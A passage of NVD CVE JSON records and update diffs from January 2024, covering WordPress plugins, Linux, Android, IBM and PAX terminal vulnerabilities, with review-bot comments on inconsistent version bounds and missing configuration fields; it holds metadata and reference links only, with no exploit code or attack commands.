"value": "Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP \u2013 Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet \u2013 A virtual wallet for WooCommerce, Long Watch Studio WooVIP \u2013 Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply \u2013 Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder \u2013 Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet \u2013 A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP \u2013 Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply \u2013 Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder \u2013 Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-918"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}
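Review bot: The description gives the affected bound for Wpopal Core Features as `through 1.5.8`, but the last reference URL names `wpopal-core-features-plugin-1-5-7`, so the two disagree on the last affected version. Treat 1.5.8 as affected until the CNA clarifies. The record covers fifteen separate plugins under one CVE id and has no `configurations` block, so CPE-based matching will report nothing for any of them; matching has to be keyed on the plugin slugs in the reference URLs and the per-product bounds in the description. The only score is `"type": "Secondary"` from the CNA, and the description has a missing space at `MU.This` and a trailing `\n\n` that display code should trim.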


@ -2,8 +2,8 @@
"id": "CVE-2022-42889",
"sourceIdentifier": "security@apache.org",
"published": "2022-10-13T13:15:10.113",
"lastModified": "2023-04-17T16:47:17.233",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.583",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -52,7 +52,6 @@
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
@ -70,7 +69,6 @@
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
@ -173,6 +171,10 @@
"VDB Entry"
]
},
{
"url": "http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html",
"source": "security@apache.org"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Feb/3",
"source": "security@apache.org",
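Review bot: The two configuration hunks (`@ -52,7 +52,6 @` and `@ -70,7 +69,6 @`) appear to drop the configuration-level `"operator": "AND"`, leaving each configuration object with only its `nodes` array. A consumer that required that key, or used it to combine nodes, now has to choose a default when it is absent. The hunks show only the first node of each configuration, so whether any configuration holds more than one node cannot be confirmed from here. The parser that ingests these records should be checked to accept a configuration without `operator` and to evaluate a single node on its own.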


@ -0,0 +1,55 @@
{
"id": "CVE-2022-45083",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.247",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress: from n/a through 4.3.2.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.3,
"impactScore": 3.7
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-502"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}


@ -0,0 +1,55 @@
{
"id": "CVE-2022-45845",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.467",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-502"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}


@ -0,0 +1,55 @@
{
"id": "CVE-2022-47160",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.777",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-200"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2022-48619",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-12T03:15:08.633",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:27:59.073",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,15 +14,75 @@
"value": "Se descubri\u00f3 un problema en drivers/input/input.c en el kernel de Linux anterior a la versi\u00f3n 5.17.10. Un atacante puede provocar una denegaci\u00f3n de servicio (p\u00e1nico) porque input_set_capability maneja mal la situaci\u00f3n en la que un c\u00f3digo de evento queda fuera de un mapa de bits."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17.10",
"matchCriteriaId": "9FD70CAF-9EE4-481A-B8B7-4245DD096325"
}
]
}
]
}
],
"references": [
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.10",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch"
]
},
{
"url": "https://github.com/torvalds/linux/commit/409353cbe9fe48f6bc196114c442b1cff05a39bc",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Patch"
]
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-2007",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-04-24T23:15:18.877",
"lastModified": "2023-10-20T00:15:12.483",
"lastModified": "2024-01-19T16:15:08.907",
"vulnStatus": "Undergoing Analysis",
"descriptions": [
{
@ -90,6 +90,10 @@
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html",
"source": "secalert@redhat.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0011/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5480",
"source": "secalert@redhat.com"


@ -2,8 +2,8 @@
"id": "CVE-2023-21255",
"sourceIdentifier": "security@android.com",
"published": "2023-07-13T00:15:24.053",
"lastModified": "2023-11-02T01:13:59.657",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.713",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -103,6 +103,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0010/",
"source": "security@android.com"
},
{
"url": "https://source.android.com/security/bulletin/2023-07-01",
"source": "security@android.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-21400",
"sourceIdentifier": "security@android.com",
"published": "2023-07-13T00:15:24.340",
"lastModified": "2023-10-26T18:20:32.370",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.817",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -132,6 +132,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0012/",
"source": "security@android.com"
},
{
"url": "https://source.android.com/security/bulletin/pixel/2023-07-01",
"source": "security@android.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-27168",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.247",
"lastModified": "2024-01-19T14:15:12.247",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,12 +2,16 @@
"id": "CVE-2023-32337",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.537",
"lastModified": "2024-01-19T02:15:07.537",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288."
},
{
"lang": "es",
"value": "IBM Maximo Spatial Asset Management 8.10 es vulnerable a server-side request forgery (SSRF). Esto puede permitir que un atacante autenticado env\u00ede solicitudes no autorizadas desde el sistema, lo que podr\u00eda provocar la enumeraci\u00f3n de la red o facilitar otros ataques. ID de IBM X-Force: 255288."
}
],
"metrics": {


@ -2,8 +2,8 @@
"id": "CVE-2023-38003",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T01:15:08.217",
"lastModified": "2023-12-07T15:34:59.537",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.013",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -136,6 +136,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7078681",
"source": "psirt@us.ibm.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-38727",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T02:15:06.867",
"lastModified": "2023-12-07T17:34:50.503",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.123",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -144,6 +144,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087143",
"source": "psirt@us.ibm.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-40687",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T02:15:07.077",
"lastModified": "2023-12-07T17:34:30.903",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.237",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -143,6 +143,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087149",
"source": "psirt@us.ibm.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-40692",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T00:15:07.000",
"lastModified": "2023-12-07T15:29:41.200",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.330",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -136,6 +136,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087157",
"source": "psirt@us.ibm.com",


@ -2,8 +2,8 @@
"id": "CVE-2023-42134",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.190",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:14:39.460",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,93 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314",
"matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314",
"matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-42135",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.413",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:47:29.607",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,93 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-42136",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.670",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:19:25.047",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,261 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
